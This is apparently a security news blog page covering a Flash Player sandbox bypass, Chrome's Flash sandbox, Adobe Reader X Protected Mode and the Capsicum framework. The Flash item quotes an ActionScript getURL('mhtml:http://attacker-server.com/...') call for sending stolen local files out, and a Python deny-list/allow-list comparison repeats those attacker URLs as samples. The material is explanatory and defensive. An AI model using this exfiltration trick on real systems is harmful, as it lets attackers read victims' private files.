April 18, 2014

Bypass Flash Player Sandbox

Adobe Flash applications that run locally can read local files and transfer them to an attacker's server.

Adobe has implemented a number of sandboxes to protect the user. The restrictions a sandbox imposes depend on the origin and access rights of the SWF file: local SWF files run within the local-with-file-system sandbox, which permits access to local files but denies access to the network.

However, security researcher Billy Rios discovered that Adobe enforces this network restriction with a blacklist of protocols such as HTTP and HTTPS. It is therefore possible to send files to a server using the file: protocol handler, which the blacklist does not cover. This route, however, only reaches hosts on the local area network.

Billy Rios also identified another protocol handler, mhtml, which is not on the blacklist either and can be used to send data from the victim's PC to a remote server with the ActionScript call getURL('mhtml:http://attacker-server.com/stolen-data-here', '');
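The underlying weakness is that a deny-list of "known network" schemes passes anything it has not heard of, while a local-with-file-system policy should really be an allow-list of references that cannot leave the local disk. The following Python model is an added example; it is not code from the original page, from Adobe or from Billy Rios, and it does not claim to reproduce Adobe's actual check. The function names, the policy itself and the sample references (other than the attacker-server.com URL quoted above) are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

# A deny-list filter names the network schemes it knows about and passes
# everything else; this is the shape of check the bypass above exploits.
BLACKLISTED_SCHEMES = {"http", "https"}

# A local-with-file-system policy should accept nothing but local paths:
# scheme-less relative paths and file: URLs that name no host.
ALLOWED_SCHEMES = {"", "file"}


def blacklist_allows(url: str) -> bool:
    """Model of a deny-list check (assumed, not Adobe's code): refuse only
    the named network schemes, so mhtml: and file://host/... slip through."""
    return urlsplit(url).scheme not in BLACKLISTED_SCHEMES


def allowlist_allows(url: str) -> bool:
    """Model of an allow-list check (assumed): permit only references that
    cannot leave the local disk."""
    parts = urlsplit(url)
    # "C:\secret.txt" parses as scheme "c"; a one-letter scheme is a Windows
    # drive letter, i.e. a local path, provided no host follows it.
    is_drive_letter = len(parts.scheme) == 1
    if not is_drive_letter and parts.scheme not in ALLOWED_SCHEMES:
        return False  # http, https, mhtml, ftp, anything not listed
    if parts.netloc:
        return False  # file://server/share names a LAN host (UNC/SMB)
    if parts.path.startswith(("//", "\\\\")):
        return False  # bare UNC path, or file:////server/share
    return True


# Constructed sample references: the two bypasses named above, a plain HTTP
# request, and two genuinely local references.
SAMPLE_URLS = [
    "http://attacker-server.com/stolen-data-here",
    "mhtml:http://attacker-server.com/stolen-data-here",
    "file://fileserver/share/stolen-data-here",
    "file:///C:/Users/victim/Documents/secret.txt",
    "C:\\Users\\victim\\Documents\\secret.txt",
]


def compare_policies(urls=SAMPLE_URLS):
    """Return {url: (deny_list_verdict, allow_list_verdict)} per reference."""
    return {u: (blacklist_allows(u), allowlist_allows(u)) for u in urls}


if __name__ == "__main__":
    for url, (deny, allow) in compare_policies().items():
        print(f"{url:52} blacklist={'pass' if deny else 'block':5} "
              f"allowlist={'pass' if allow else 'block'}")
```

Run stand-alone, the table shows the deny-list passing both the mhtml: and the file://host references while the allow-list blocks them and still accepts the two local paths. Note that `urlsplit` treats a Windows drive letter as a one-character scheme, which is why the allow-list special-cases it rather than rejecting every unlisted scheme outright.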

Chrome to run Flash Player in a sandbox

The latest developer version (dev channel) of the Chrome browser for Windows is equipped with a sandbox for running Adobe's Flash plug-in. If an attacker succeeds in exploiting a security vulnerability in the plug-in, the sandbox should cushion the worst of the blow by blocking access to critical system files. Adobe Flash Player is a godsend for attackers, because almost everyone has it installed on their system and new vulnerabilities in Flash are constantly being discovered.

Read the full story here.


Adobe Reader X with Windows Sandbox

Adobe Systems has added a new security layer to the Windows versions of its document reader, Adobe Reader X, by implementing a sandbox.

The feature, dubbed 'Protected Mode' by Adobe, blocks attempts by malicious PDFs to write files and execute code. It should also prevent such files from making registry changes. Future versions will reportedly control read access as well, to prevent attackers from reading confidential data from the file system.

According to Adobe's blog, with Adobe Reader Protected Mode enabled (it will be by default), all operations required by Adobe Reader to display the PDF file to the user are run in a very restricted manner inside a confined environment, the "sandbox." Should Adobe Reader need to perform an action that is not permitted in the sandboxed environment, such as writing to the user's temporary folder or launching an attachment inside a PDF file using an external application (e.g. Microsoft Word), those requests are funneled through a "broker process," which has a strict set of policies for what is allowed and disallowed to prevent access to dangerous functionality.

A few days ago Adobe also released version 9.4.1, which fixed more than 19 vulnerabilities.

Download Adobe Reader X here.

Capsicum: New Sandbox Framework with OS Capabilities

Security researchers at the University of Cambridge Computer Laboratory have released a new sandbox framework.

According to the project website, Capsicum is a lightweight OS capability and sandbox framework developed at the University of Cambridge Computer Laboratory, supported by a grant from Google. Capsicum extends the POSIX API, providing several new OS primitives to support object-capability security on UNIX-like operating systems:

  • capabilities – refined file descriptors with fine-grained rights
  • capability mode – process sandboxes that deny access to global namespaces
  • process descriptors – capability-centric process ID replacement
  • anonymous shared memory objects – an extension to the POSIX shared memory API to support anonymous swap objects associated with file descriptors (capabilities)
  • rtld-elf-cap – modified ELF run-time linker to construct sandboxed applications
  • libcapsicum – library to create and use capabilities and sandboxed components
  • libuserangel – library allowing sandboxed applications or components to interact with user angels, such as Power Boxes.
  • chromium-capsicum – a version of Google’s Chromium web browser that uses capability mode and capabilities to provide effective sandboxing of high-risk web page rendering.

Capsicum has been prototyped on FreeBSD 8.x, and its experimental code is BSD-licensed to encourage open source, research, and commercial deployment.

Find more information about Capsicum here.